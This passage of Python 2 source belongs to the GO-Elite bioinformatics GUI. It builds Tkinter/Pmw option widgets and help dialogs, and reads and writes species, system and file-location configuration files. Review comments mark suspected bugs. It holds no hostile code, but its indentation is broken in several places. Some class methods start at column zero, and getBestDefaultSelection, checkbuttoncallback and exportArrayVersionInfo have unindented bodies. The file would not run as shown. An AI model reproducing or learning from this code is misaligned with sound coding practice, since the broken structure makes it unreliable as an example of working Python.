                ln = Label(parent_type, text=self.title,fg="blue"); ln.pack(padx = 10)
            if 'enter' in od.DisplayObject() and self.display_options != ['NA']:
                self._option = option
                ### Create and pack a horizontal RadioSelect widget.
                self.default_option = od.DefaultOption()
                #print self.default_option, self.title; kill
                def custom_validate(tag,custom_validate=self.custom_validate,option=option):
                    validate = custom_validate(tag,option)
                def custom_validate_p(tag,custom_validate_p=self.custom_validate_p,option=option):
                    validate = custom_validate_p(tag,option)
                    #print [validate], tag, option
                # Defaults <= 1 are treated as p-value thresholds, others as integers
                try:
                    if float(self.default_option) <= 1: use_method = 'p'
                    else: use_method = 'i'
                except ValueError:
                    use_method = 'i'
                # NOTE(review): both branches pass validate=custom_validate;
                # custom_validate_p appears intended for the 'p' branch — confirm
                if use_method == 'p':
                    self.entry_field = PmwFreeze.EntryField(parent_type,
                        labelpos = 'w',
                        label_text = self.title,
                        validate = custom_validate,
                        value = self.default_option, hull_borderwidth = 2, hull_relief = 'ridge'
                        ); self.entry_field.pack(fill = 'x', expand = 1, padx = 10, pady = 10)
                if use_method == 'i':
                    self.entry_field = PmwFreeze.EntryField(parent_type,
                        labelpos = 'w',
                        label_text = self.title,
                        validate = custom_validate,
                        value = self.default_option, hull_borderwidth = 2, hull_relief = 'ridge'
                        ); self.entry_field.pack(fill = 'x', expand = 1, padx = 10, pady = 10)
                if len(od.Description())>0:
                    ln = Label(parent_type, text=od.Description(),fg="red"); ln.pack(padx = 10)
            if 'multiple-checkbox' in od.DisplayObject() and self.display_options != ['NA']:
                self._option = option
                self.default_option = od.DefaultOption()
                ### Create and pack a vertical RadioSelect widget, with checkbuttons.
                self.checkbuttons = PmwFreeze.RadioSelect(parent_type,
                    buttontype = 'checkbutton', orient = 'vertical',
                    labelpos = 'w', command = self.checkbuttoncallback,
                    label_text = self.title, hull_borderwidth = 2, hull_relief = 'ridge',
                    ); self.checkbuttons.pack(side = 'top', expand = 1, padx = 10, pady = 10)
                ### Add some buttons to the checkbutton RadioSelect.
                for text in self.display_options:
                    if text != ['NA']: self.checkbuttons.add(text)
                self.checkbuttons.invoke(self.default_option)
                self.checkbuttons.invoke(self.default_option2)
            if 'single-checkbox' in od.DisplayObject() and self.display_options != ['NA']:
                self._option = option
                proceed = 'yes'
                """if option == 'export_splice_index_values':
                    if analysis_method != 'splicing-index': proceed = 'no' ### only export corrected constitutive ratios if splicing index method chosen"""
                if proceed == 'yes':
                    self.default_option = od.DefaultOption()
                    if self.default_option != 'NA':
                        def checkbuttoncallback(tag,state,checkbuttoncallback=self.checkbuttoncallback,option=option):
                            checkbuttoncallback(tag,state,option)
                        ### Create and pack a vertical RadioSelect widget, with checkbuttons. hull_relief
                        self.checkbuttons = PmwFreeze.RadioSelect(parent_type,
                            buttontype = 'checkbutton', command = checkbuttoncallback,
                            hull_borderwidth = 2,
                            ); self.checkbuttons.pack(side = 'top', expand = 1, padx = 10, pady = 10)
                        ### Add some buttons to the checkbutton RadioSelect.
                        self.checkbuttons.add(self.title)
                        if self.default_option == 'yes': self.checkbuttons.invoke(self.title)
                        else: self._user_variables[option] = 'no'
        i+=1 ####Keep track of index
    # Context-specific helper buttons below the option widgets
    if len(option_list)>0:
        if 'process_go' in option_list: ### For the CEL file selection window, provide a link to get Annotation files
            button_text = 'Download Annotation CSVs'; d_url = 'http://www.affymetrix.com/support/technical/byproduct.affx?cat=arrays'
            self.d_url = d_url; text_button = Button(self._parent, text=button_text, command=self.Dlinkout); text_button.pack(side = 'left', padx = 5, pady = 5)
        if 'permutation' in option_list:
            #ScrolledCanvas().mainloop()
            systemCodes_win = Button(parent_type, text="GO-Elite Supported System Codes", command=self.systemCodes)
            systemCodes_win.pack(side = 'bottom', padx = 5, pady = 5)
        if 'new_species_name' in option_list:
            button_text = 'Lookup Species TaxID'; d_url = 'http://www.ncbi.nlm.nih.gov/sites/entrez?db=taxonomy'
            self.d_url = d_url; text_button = Button(self._parent, text=button_text, command=self.Dlinkout); text_button.pack(side = 'left', padx = 5, pady = 5)
    # Standard navigation buttons shared by every options window
    continue_to_next_win = Button(text = 'Continue', command = self._parent.destroy)
    continue_to_next_win.pack(side = 'right', padx = 10, pady = 10)
    back_button = Button(self._parent, text="Back", command=self.goBack)
    back_button.pack(side = 'right', padx =10, pady = 5)
    quit_win = Button(self._parent, text="Quit", command=self.quit)
    quit_win.pack(side = 'right', padx =10, pady = 5)
    button_text = 'Help'
    url = 'http://www.genmapp.org/go_elite/help_main.htm'; self.url = url
    pdf_help_file = 'Documentation/GO-Elite_Manual.pdf'; pdf_help_file = filepath(pdf_help_file); self.pdf_help_file = pdf_help_file
    try: help_button = Button(self._parent, text=button_text, command=self.GetHelpTopLevel); help_button.pack(side = 'left', padx = 5, pady = 5)
    except Exception: help_button = Button(self._parent, text=button_text, command=self.linkout); help_button.pack(side = 'left', padx = 5, pady = 5)
    self._parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
    self._parent.mainloop()
def goBack(self):
    """Destroy this window and restart the GO-Elite parameter flow; 'ORA'
    mode (with current selections) when the window had a filter_method,
    otherwise 'skip'.  Never returns (sys.exit)."""
    self._parent.destroy()
    if 'filter_method' in self._option_list: run_parameter = 'ORA',self._user_variables
    else: run_parameter = 'skip'
    # reload() picks up any state reset in the GO_Elite module before re-entry
    reload(GO_Elite); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
def GetHelpTopLevel(self):
    """Open a small dialog offering online documentation or the local
    PDF manual; each button closes the dialog after launching help."""
    message = ''
    self.message = message; self.online_help = 'Online Documentation'; self.pdf_help = 'Local PDF File'
    tl = Toplevel(); self._tl = tl; nulls = '\t\t\t\t'; tl.title('Please select one of the options')
    self.sf = PmwFreeze.ScrolledFrame(self._tl,
        labelpos = 'n', label_text = '',
        usehullsize = 1, hull_width = 220, hull_height = 150)
    self.sf.pack(padx = 10, pady = 10, fill = 'both', expand = 1)
    self.frame = self.sf.interior()
    group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Options')
    group.pack(fill = 'both', expand = 1, padx = 20, pady = 10)
    # Tab-filled label pads the group to a reasonable width
    l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
    text_button2 = Button(group.interior(), text=self.online_help, command=self.openOnlineHelp); text_button2.pack(side = 'top', padx = 5, pady = 5)
    # NOTE(review): both branches are identical; the except appears vestigial
    try: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
    except Exception: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
    tl.mainloop()
def openPDFHelp(self):
    """Open the bundled PDF manual with the platform viewer, then close the dialog."""
    quoted = '"' + self.pdf_help_file + '"'
    if os.name == 'nt':
        try:
            os.startfile(quoted)
        except Exception:
            os.system('open ' + quoted)
    elif 'darwin' in sys.platform:
        os.system('open ' + quoted)
    elif 'linux' in sys.platform:
        os.system('xdg-open ' + quoted)
    self._tl.destroy()
def openOnlineHelp(self):
    """Launch the online help URL (ignoring browser errors) and close the dialog."""
    try:
        webbrowser.open(self.url)
    except Exception:
        pass
    self._tl.destroy()
def linkout(self):
    """Open self.url in the default browser, ignoring any failure."""
    try:
        webbrowser.open(self.url)
    except Exception:
        pass
def Dlinkout(self):
    """Open the download URL (self.d_url) in the default browser, ignoring failure."""
    try:
        webbrowser.open(self.d_url)
    except Exception:
        pass
def setvscrollmode(self, tag):
    """Set the ScrolledFrame's vertical scroll mode (e.g. 'static'/'dynamic'/'none')."""
    self.sf.configure(vscrollmode=tag)
def systemCodes(self):
    """Show a scrolled text dialog listing the system name / system code /
    MOD triples supported for the currently selected species.  Column
    widths are padded with spaces tuned per platform (Windows vs Vista vs
    other OSes) so the tab-separated columns roughly line up."""
    selected_species = self._user_variables['species']
    species_systems = getSpeciesSystems(selected_species)
    GO_Elite.sourceData()
    about = "System Name"+'\t\t'+"System Code"+'\t\t'+"MOD"+'\n'
    system_list=[]
    for system_name in system_codes:
        sc = system_codes[system_name]
        if system_name in species_systems: ### Restrict by species
            system_list.append([system_name,sc.SystemCode(),sc.MOD()])
    system_list.sort()
    for (system_name,system_code,mod) in system_list:
        filler = ' '; filler2=''
        # Font metrics differ per platform; pick padding widths accordingly
        if os.name == 'nt':
            if platform.win32_ver()[0] != 'Vista': val = 9; val2 = 14; val3 = 19
            else: val = 12; val2 = 17; val3 = 20
        else: val = 12; val2 = 17; val3 = 20
        if os.name == 'nt':
            if len(system_name)<val: filler = val2-len(system_name); filler = filler*' '+' '
            if len(mod)<val: filler2 = val3-len(mod); filler2 = filler2*' '
        about+= system_name+filler+'\t\t'+system_code+filler2+'\t\t'+mod+'\n'
    #tkMessageBox.showinfo("Available GO-Elite System Codes",about,parent=self._parent)
    dialog = PmwFreeze.TextDialog(self._parent, scrolledtext_labelpos = 'n',
        title = 'GO-Elite System Codes', defaultbutton = 0,
        label_text = 'Available System Information for '+selected_species)
    dialog.insert('end', about)
def info(self):
    """Show a placeholder modal info box (debug/demo helper)."""
    tkMessageBox.showinfo("title","message",parent=self._parent)
def deleteWindow(self):
    """WM_DELETE_WINDOW handler: closing the window exits the program."""
    #tkMessageBox.showwarning("Quit","Use 'Quit' button to end program!",parent=self._parent)
    self._parent.destroy(); sys.exit() ### just quit instead
def quit(self):
    """Stop the Tk mainloop, destroy the window and exit the process."""
    self._parent.quit()
    self._parent.destroy()
    sys.exit()
def chooseDirectory(self, option):
    """Prompt the user for a directory and record the result under option."""
    chosen = tkFileDialog.askdirectory(parent=self._parent)
    self._user_variables[option] = chosen
def getPath(self,option):
    """Open a directory or file chooser (by option name substring), push the
    selection into the entry's StringVar and self._user_variables, and
    persist it as the new default location via file_location_defaults.

    Each dialog call falls back progressively: remembered default dir/file,
    then no initialdir, then empty string — guarding against a stale or
    invalid remembered path.
    """
    if 'dir' in option or 'folder' in option:
        try: dirPath = tkFileDialog.askdirectory(parent=self._parent,initialdir=self.default_dir)
        except Exception:
            self.default_dir = ''
            try: dirPath = tkFileDialog.askdirectory(parent=self._parent,initialdir=self.default_dir)
            except Exception:
                try: dirPath = tkFileDialog.askdirectory(parent=self._parent)
                except Exception: dirPath=''
        self.default_dir = dirPath
        entrytxt = self.pathdb[option]
        entrytxt.set(dirPath)
        self._user_variables[option] = dirPath
        try: file_location_defaults['PathDir'].SetLocation(dirPath)
        except Exception: null = None
        exportDefaultFileLocations(file_location_defaults)
        ### Allows the option_db to be updated for the next round (if an error is encountered)
    if 'file' in option:
        try: tag = tkFileDialog.askopenfile(parent=self._parent,initialdir=self.default_file)
        except Exception:
            self.default_file = ''
            try: tag = tkFileDialog.askopenfile(parent=self._parent,initialdir=self.default_file)
            except Exception:
                try: tag = tkFileDialog.askopenfile(parent=self._parent)
                except Exception: tag=''
        # askopenfile returns a file object (or None on cancel): keep its name
        try: filePath = tag.name #initialdir=self.default_dir
        except AttributeError: filePath = ''
        filePath_dir = string.join(string.split(filePath,'/')[:-1],'/')
        self.default_file = filePath_dir
        entrytxt = self.pathdb[option]
        entrytxt.set(filePath)
        self._user_variables[option] = filePath
        try: file_location_defaults['PathFile'].SetLocation(filePath_dir)
        except Exception: null = None
        exportDefaultFileLocations(file_location_defaults)
def Report(self, tag, option):
    """Return the selected value unchanged (hook used by __repr__)."""
    return tag
# NOTE(review): non-standard __repr__ signature (extra tag/option args) —
# plain repr(obj) would raise TypeError; presumably only called explicitly.
# Confirm callers before changing.
def __repr__(self,tag,option): return self.Report(tag,option)
def Results(self):
    """Expose the dict of accumulated user selections."""
    return self._user_variables
def custom_validate(self, text, option):
    """Pmw validator: always record text under option, then return 1 when
    the text parses as a number, -1 otherwise."""
    self._user_variables[option] = text
    try:
        float(text)
    except ValueError:
        return -1
    return 1
def custom_validate_p(self, text, option):
    """Pmw validator for p-value fields: record text under option and
    return 1 only for numeric values strictly below 1, else -1."""
    self._user_variables[option] = text
    try:
        return 1 if float(text) < 1 else -1
    except ValueError:
        return -1
def callback(self, tag, option):
    """Generic widget callback: store tag under option, with extra handling
    for options that affect other widgets:

    - 'ORA_algorithm': sync the permutation entry field/value with the
      chosen algorithm (2000 for permutation, NA/0 for Fisher).
    - 'dbase_version': switch the active database, then repopulate every
      species OptionMenu and re-validate stored species selections.
    - 'selected_version': repopulate species menus from db_versions.
    """
    #print 'Button',[option], tag,'was pressed.'
    self._user_variables[option] = tag
    if option == 'ORA_algorithm':
        if tag == 'Permute p-value':
            try: self.entry_field.setentry('2000')
            except Exception: null=[]
            self._user_variables['permutation'] = '2000'
        elif tag == 'Fisher Exact Test':
            try: self.entry_field.setentry('NA')
            except Exception: null=[]
            self._user_variables['permutation'] = '0'
    if option == 'dbase_version':
        ###Export new species info
        exportDBversion(tag)
        current_species_names = getSpeciesList()
        ### THIS TOOK FOR EVER TO FIND!!!!!! setitems of the PMW object resets the value list
        if 'permutation' in self._option_list:
            try: self.speciescomp.setitems(current_species_names)
            except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
        else:
            try: self.speciescomp.setitems(['all-supported','New Species','---']+current_species_names)
            except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
        for i in self._option_list:
            var = 'proceed'
            if 'species' in i: ### Necessary if the user changes dbase_version and selects continue to accept the displayed species name (since it's note directly invoked)
                if 'species' in self._user_variables:
                    if self._user_variables[i] in current_species_names: var = None
                if var == 'proceed':
                    try: self._user_variables[i] = current_species_names[0]
                    except Exception: null = []
    elif option == 'selected_version':
        current_species_names = db_versions[tag]
        current_species_names.sort()
        try: self.speciescomp.setitems(['---']+current_species_names)
        except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
        try: self.speciescomp2.setitems(['---']+current_species_names)
        except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
        try: self.speciescomp3.setitems(['---']+current_species_names)
        except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
def callbackComboBox(self, tag, option):
    """ Similiar to the above, callback, but ComboBox uses unique methods """
    #print 'Button',[option], tag,'was pressed.'
    self._user_variables[option] = tag
    if option == 'selected_version':
        # A new EnsMart/database version was picked: refresh every species
        # ComboBox list and keep the previous species when still available
        current_species_names = db_versions[tag]
        current_species_names.sort()
        current_species_names = ['---']+current_species_names
        species_option = current_species_names[0]
        try:
            self.speciescomp._list.setlist(current_species_names) ### This is the way we set a new list for ComboBox
            ### Select the best default option to display (keep existing or re-set)
            if 'selected_species1' in self._user_variables: ### If this is the species downloader
                species_option = 'selected_species1'
            else:
                for i in self._user_variables:
                    if 'species' in i: species_option = i
            default = self.getBestDefaultSelection(species_option,current_species_names)
            self.speciescomp.selectitem(default)
        except Exception: None ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
        try:
            self.speciescomp2._list.setlist(current_species_names)
            default = self.getBestDefaultSelection('selected_species2',current_species_names)
            self.speciescomp2.selectitem(default)
        except Exception: None ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
        try:
            self.speciescomp3._list.setlist(current_species_names)
            default = self.getBestDefaultSelection('selected_species3',current_species_names)
            self.speciescomp3.selectitem(default)
        except Exception: None ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
def getBestDefaultSelection(self,option,option_list):
default = option_list[0] ### set the default to the first option listed
if option in self._user_variables:
selected = self._user_variables[option]
if selected in option_list: ### If selected species exists in the new selected version of EnsMart
default = selected
else:
self._user_variables[option] = default ### Hence, the default has changed, so re-set it
return default
    def multcallback(self, tag, state):
        # Callback for multi-select widgets; 'state' is truthy when pressed.
        if state: action = 'pressed.'
        else: action = 'released.'
        """print 'Button', tag, 'was', action, \
            'Selection:', self.multiple.getcurselection()"""
        # NOTE(review): 'option' is not a parameter of this method and is not
        # defined locally, so this line raises NameError when invoked (unless a
        # module-level 'option' happens to exist). It likely should key on
        # 'tag' as other callbacks do - confirm intended behavior before fixing.
        self._user_variables[option] = tag
def checkbuttoncallback(self, tag, state, option):
if state: action = 'pressed.'
else: action = 'released.'
"""print 'Button',[option], tag, 'was', action, \
'Selection:', self.checkbuttons.getcurselection()"""
if state==0: tag2 = 'no'
else: tag2 = 'yes'
#print '---blahh', [option], [tag], [state], [action], [self.checkbuttons.getcurselection()]
self._user_variables[option] = tag2
def getSpeciesList():
    """Return the sorted list of species names (from the global species_codes)
    that have a database directory installed under /Databases, repairing the
    configuration when the Databases folder or version file is corrupt."""
    try: current_species_dirs = unique.read_directory('/Databases')
    except Exception: ### Occurs when the version file gets over-written with a bad directory name
        try:
            ### Remove the version file and wipe the species file
            os.remove(filepath('Config/version.txt'))
            raw = export.ExportFile('Config/species.txt'); raw.close()
            os.mkdir(filepath('Databases'))
        except Exception: null = [] ### e.g. the Databases folder already exists
        elite_db_versions = returnDirectoriesNoReplace('/Databases')
        try: exportDBversion(elite_db_versions[0])
        except Exception: exportDBversion('') ### no database versions installed yet
        current_species_dirs = unique.read_directory('/Databases')
    current_species_names=[]
    # Keep only species whose code matches an installed database directory
    for species in species_codes:
        if species_codes[species].SpeciesCode() in current_species_dirs: current_species_names.append(species)
    current_species_names.sort()
    return current_species_names
def exportDBversion(db_version):
    """Record the selected database version plus today's date (M/D/YYYY,
    zero-padded) in the Config/ version file via OBO_import."""
    year, month, day = string.split(str(datetime.date.today()), '-')
    today = month+'/'+day+'/'+year
    OBO_import.exportVersionData(db_version, today, 'Config/')
def getSpeciesSystems(species):
    """Return the unique list of gene ID systems that have relationship files
    installed for the given species (scanning the uid-gene, gene-mapp and
    gene-go database folders)."""
    species_code = species_codes[species].SpeciesCode()
    relationship_files = []
    for subdir in ('uid-gene', 'gene-mapp', 'gene-go'):
        try: relationship_files += read_directory('/Databases/'+species_code+'/'+subdir)
        except Exception: pass ### this folder is absent for the species
    systems=[]
    for filename in relationship_files:
        ### Filenames encode the systems, e.g. 'Ensembl-Affymetrix.txt'
        filename = string.replace(filename,'.txt','')
        systems += string.split(filename,'-')
    return unique.unique(systems)
class SpeciesData:
    """Record describing one supported species: its short code, full name,
    the compatible MOD systems and its taxonomy identifier."""
    def __init__(self, abrev, species, systems, taxid):
        self._abrev = abrev
        self._species = species
        self._systems = systems
        self._taxid = taxid
    def SpeciesCode(self): return self._abrev
    def SpeciesName(self): return self._species
    def Systems(self): return self._systems
    def TaxID(self): return self._taxid
    def __repr__(self):
        return '%s|%s' % (self.SpeciesCode(), self.SpeciesName())
def importSpeciesInfo():
    """Load species definitions into the module globals 'species_list' and
    'species_codes' and return species_codes.

    Reads 'Config/species_all.txt' when integrate_online_species == 'yes'
    (set by remoteSpeciesInfo), otherwise 'Config/species.txt'. Each data row
    is tab-delimited: species_code, species_name, tax_id, compatible_mods
    ('|'-separated). On a malformed file the file is wiped and the program
    restarts via GO_Elite.importGOEliteParameters."""
    try:
        if integrate_online_species == 'yes': filename = 'Config/species_all.txt'
        else: filename = 'Config/species.txt'
    except Exception: filename = 'Config/species.txt' ### integrate_online_species not defined yet
    fn=filepath(filename); global species_list; species_list=[]; global species_codes; species_codes={}; x=0
    for line in open(fn,'rU').readlines():
        data = cleanUpLine(line)
        try:
            abrev,species,taxid,compatible_mods = string.split(data,'\t')
        except Exception:
            ### BUG FIX: the original tested "if '!DOCTYPE':", a constant that is
            ### always true; check whether the line actually looks like a
            ### downloaded HTML error page before blaming the connection.
            if '!DOCTYPE' in data: print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
            else: print_out = "Unknown file error encountered."
            raw = export.ExportFile(fn); raw.close(); GO_Elite.importGOEliteParameters('skip'); sys.exit()
        if x==0: x=1 ### skip the header row
        else:
            compatible_mods = string.split(compatible_mods,'|')
            species_list.append(species)
            sd = SpeciesData(abrev,species,compatible_mods,taxid)
            species_codes[species] = sd
    return species_codes
def remoteSpeciesInfo(integrate_online):
    """Import species info (optionally from the online 'species_all' list) and
    return a dict of SpeciesData keyed by species CODE rather than name."""
    global integrate_online_species
    integrate_online_species = integrate_online
    species_names = {}
    importSpeciesInfo()
    if len(species_codes) == 0:
        ### An unknown error erased the species file - rebuild from the online list
        integrate_online_species = 'yes'
        importSpeciesInfo()
        exportSpeciesInfo(species_codes) ### Re-sets this database
    for species_name in species_codes:
        sd = species_codes[species_name]
        species_names[sd.SpeciesCode()] = sd
    return species_names
def exportSpeciesInfo(species_codes):
    """Re-write Config/species.txt from the supplied species_codes dict,
    skipping placeholder entries ('New Species', 'all-' archives, blanks)."""
    fn = filepath('Config/species.txt')
    data = open(fn, 'w')
    data.write(string.join(['species_code','species_name','tax_id','compatible_algorithms'],'\t')+'\n')
    for species in species_codes:
        if 'New Species' in species or 'all-' in species or species == '':
            continue ### placeholder rows are never exported
        sd = species_codes[species]
        row = [sd.SpeciesCode(), sd.SpeciesName(), sd.TaxID(), string.join(sd.Systems(),'|')]
        data.write(string.join(row,'\t')+'\n')
    data.close()
def exportArrayVersionInfo(species_array_db):
fn=filepath('Config/array_versions.txt'); data = open(fn,'w'); x=0
print 'Exporting:',fn
for (species,db_version) in species_array_db:
supported_arrays = unique.unique(species_array_db[(species,db_version)])
supported_arrays = string.join(supported_arrays,'|')
values = [species,db_version,supported_arrays]
values = string.join(values,'\t')+'\n'
data.write(values)
data.close()
def exportSpeciesVersionInfo(species_archive_db):
fn=filepath('Config/versions.txt'); data = open(fn,'w'); x=0
print 'Exporting:',fn
for species in species_archive_db:
db_versions = species_archive_db[species]
db_versions = string.join(db_versions,'|')
values = [species,db_versions]
values = string.join(values,'\t')+'\n'
data.write(values)
data.close()
def importOnlineDatabaseVersions():
    """Populate and return the global db_versions dict {version: [species,...]}
    from Config/versions.txt (rows: species<TAB>'|'-separated versions)."""
    global db_versions
    db_versions = {}
    fn = filepath('Config/versions.txt')
    for line in open(fn, 'rU').readlines():
        data = cleanUpLine(line)
        try:
            species, versions = string.split(data, '\t')
            for version in string.split(versions, '|'):
                try: db_versions[version].append(species)
                except KeyError: db_versions[version] = [species]
        except Exception: print [data] ### malformed row - show it and continue
    return db_versions
class SystemData:
    """Record for one gene ID system: its code, display name and MOD status."""
    def __init__(self, syscode, sysname, mod):
        self._syscode = syscode
        self._sysname = sysname
        self._mod = mod
    def SystemCode(self): return self._syscode
    def SystemName(self): return self._sysname
    def MOD(self): return self._mod
    def __repr__(self):
        return '%s|%s|%s' % (self._syscode, self._sysname, self._mod)
def importSystemInfo():
    """Parse Config/source_data.txt into the global system_codes/system_list
    (initialized by remoteSystemInfo) and return (system_codes, system_list,
    mod_list), where mod_list holds systems flagged in the MOD column. If the
    file is actually a downloaded HTML error page, restore the archived copy
    and re-parse recursively (results accumulate in the shared globals)."""
    filename = 'Config/source_data.txt'; x=0
    fn=filepath(filename); mod_list=[]
    for line in open(fn,'rU').readlines():
        data = cleanUpLine(line)
        t = string.split(data,'\t')
        if '!DOCTYPE' in data:
            # HTML instead of tab-delimited data: restore the archive and retry
            fn2 = string.replace(fn,'.txt','_archive.txt')
            import shutil; shutil.copyfile(fn2,fn) ### Bad file was downloaded (with warning)
            importSystemInfo(); break
        else:
            try: sysname=t[0];syscode=t[1]
            except Exception: sysname=''
            try: mod = t[2]
            except Exception: mod = '' ### the MOD column is optional
            if x==0: x=1 ### header row
            elif sysname != '':
                system_list.append(sysname)
                ad = SystemData(syscode,sysname,mod)
                if len(mod)>1: mod_list.append(sysname) ### non-trivial value marks a MOD system
                system_codes[sysname] = ad
    return system_codes,system_list,mod_list
def remoteSystemInfo():
    """Reset the global system registries, re-import them from
    Config/source_data.txt and return (system_codes, system_list, mod_list)."""
    global system_list
    global system_codes
    system_list = []
    system_codes = {}
    system_codes, system_list, mod_list = importSystemInfo()
    return system_codes, system_list, mod_list
def exportSystemInfo():
    """Re-write Config/source_data.txt from the global system_codes dict;
    does nothing when no systems are loaded."""
    if len(system_codes) == 0:
        return ### nothing to export
    fn = filepath('Config/source_data.txt')
    data = open(fn, 'w')
    data.write(string.join(['System','SystemCode','MOD_status'],'\t')+'\n')
    for sysname in system_codes:
        ad = system_codes[sysname]
        data.write(string.join([sysname, ad.SystemCode(), ad.MOD()],'\t')+'\n')
    data.close()
def exportSystemInfoRemote(system_code_db):
    """Install the supplied system dict as the global registry, then export it."""
    global system_codes
    system_codes = system_code_db
    exportSystemInfo()
class FileLocationData:
    """Record for one default file/URL location entry: its status, the
    location path/URL, and the species it applies to ('all' or a code)."""
    def __init__(self, status, location, species):
        self._status = status; self._location = location; self._species = species
    def Status(self): return self._status
    def Location(self): return self._location
    def SetLocation(self,location): self._location = location
    def Species(self): return self._species
    def Report(self):
        ### BUG FIX: __repr__ referenced self.Report() but the method was never
        ### defined, so repr() raised AttributeError; provide a summary string.
        return self._status+'|'+self._location+'|'+self._species
    def __repr__(self): return self.Report()
def importDefaultFileLocations():
    """Parse Config/default-files.csv and return {app: FileLocationData or
    [FileLocationData, ...]}. Entries flagged species 'all' are stored as a
    single object; species-specific entries accumulate in a list per app."""
    fn = filepath('Config/default-files.csv')
    file_location_defaults = {}
    for line in open(fn, 'rU').readlines():
        ### CSV converted to tabs here (CSV avoids Excel mangling the file)
        data = cleanUpLine(string.replace(line, ',', '\t'))
        app, status, location, species = string.split(data, '\t')
        fl = FileLocationData(status, location, species)
        if species == 'all':
            file_location_defaults[app] = fl
        else:
            try: file_location_defaults[app].append(fl)
            except KeyError: file_location_defaults[app] = [fl]
    return file_location_defaults
def exportDefaultFileLocations(file_location_defaults):
    """Over-write Config/default-files.csv with the supplied defaults. Each
    dict value may be a single FileLocationData or a list of them."""
    fn = filepath('Config/default-files.csv')
    data = open(fn, 'w')
    for app in file_location_defaults:
        fl_list = file_location_defaults[app]
        try:
            ### Species-specific entries are stored as lists
            for fl in fl_list:
                fields = [app, fl.Status(), fl.Location(), fl.Species()]
                data.write('"'+string.join(fields,'","')+'"'+'\n')
        except Exception:
            ### A bare FileLocationData (species 'all') is not iterable
            fl = fl_list
            fields = [app, fl.Status(), fl.Location(), fl.Species()]
            data.write('"'+string.join(fields,'","')+'"'+'\n')
    data.close()
class OptionData:
    """Describes one user-configurable GUI option loaded from
    Config/options.txt: its key, display metadata, the widget type used to
    render it, the permitted analysis options and the default value."""
    def __init__(self,option,displayed_title,display_object,description,analysis_options,defaults):
        self._option = option; self._displayed_title = displayed_title; self._description = description
        self._analysis_options = analysis_options; self._display_object = display_object; self._defaults = defaults
    def Option(self): return self._option
    def Display(self): return self._displayed_title
    def DisplayObject(self): return self._display_object
    def Description(self): return self._description
    def AnalysisOptions(self): return self._analysis_options
    def DefaultOption(self): return self._defaults
    def setAnalysisOptions(self,analysis_options): self._analysis_options = analysis_options
    def setDefaultOption(self,defaults): self._defaults = defaults
    def Report(self):
        ### BUG FIX: __repr__ referenced self.Report() but the method was never
        ### defined, so repr() raised AttributeError; provide a summary string.
        return self._option+'|'+self._displayed_title
    def __repr__(self): return self.Report()
def importUserOptions(type):
    """Read Config/options.txt and return (option_group_db, option_db):
    option keys grouped by GUI section, plus an OptionData record per option.
    The 'type' argument is accepted for interface compatibility but unused."""
    option_db = {}
    option_group_db = {}
    fn = filepath('Config/options.txt')
    header_seen = 'no'
    for line in open(fn, 'rU').readlines():
        data = cleanUpLine(line)
        ### '\k' stands in for newline in the file since real newlines are stripped
        data = string.replace(data, '\k', '\n')
        option,displayed_title,display_object,group,description,analysis_options,defaults = string.split(data, '\t')
        if header_seen == 'no':
            header_seen = 'yes'
        else:
            od = OptionData(option,displayed_title,display_object,description,
                            string.split(analysis_options,'|'),defaults)
            option_db[option] = od
            try: option_group_db[group].append(option)
            except KeyError: option_group_db[group] = [option]
    return option_group_db, option_db
class IndicatorWindow:
    """Modal Tk warning window showing 'message' beside a warning icon, with a
    'Quit' button that exits the program and a custom-labelled continue
    button that simply closes the window."""
    def __init__(self,message,button_text):
        self.message = message; self.button_text = button_text
        parent = Tk(); self._parent = parent; nulls = '\t\t\t\t\t\t\t'; parent.title('Attention!!!')
        filename = 'Config/warning_big.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
        can = Canvas(parent); can.pack(side='left',padx = 10); can.config(width=img.width(), height=img.height())
        can.create_image(2, 2, image=img, anchor=NW)
        Label(parent, text='\n'+self.message+'\n'+nulls).pack()
        quit_button = Button(parent, text='Quit', command=self.quit); quit_button.pack(side = 'bottom', padx = 5, pady = 5)
        text_button = Button(parent, text=self.button_text, command=parent.destroy); text_button.pack(side = 'bottom', padx = 5, pady = 5)
        parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
        parent.mainloop()
    def quit(self): self._parent.quit(); self._parent.destroy(); sys.exit()
    def deleteWindow(self):
        # Window-manager close is disallowed; force use of the 'Quit' button.
        tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
class FeedbackWindow:
    """Modal Tk prompt displaying 'message' with one or two response buttons;
    the label of the clicked button is stored and later retrieved through
    ButtonSelection()."""
    def __init__(self,message,button_text,button_text2):
        self.message = message; self.button_text = button_text; self.button_text2 = button_text2
        parent = Tk(); self._parent = parent; nulls = '\t\t\t\t\t\t\t'; parent.title('Attention!!!')
        self._user_variables={}
        filename = 'Config/warning_big.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
        can = Canvas(parent); can.pack(side='left',padx = 10); can.config(width=img.width(), height=img.height())
        can.create_image(2, 2, image=img, anchor=NW)
        Label(parent, text='\n'+self.message+'\n'+nulls).pack()
        text_button = Button(parent, text=self.button_text, command=self.button1); text_button.pack(side = 'bottom', padx = 5, pady = 5)
        if button_text2 != '':
            # A second response button is optional
            text_button2 = Button(parent, text=self.button_text2, command=self.button2); text_button2.pack(side = 'bottom', padx = 5, pady = 5)
        parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
        parent.mainloop()
    def button1(self): self._user_variables['button']=self.button_text; self._parent.destroy()
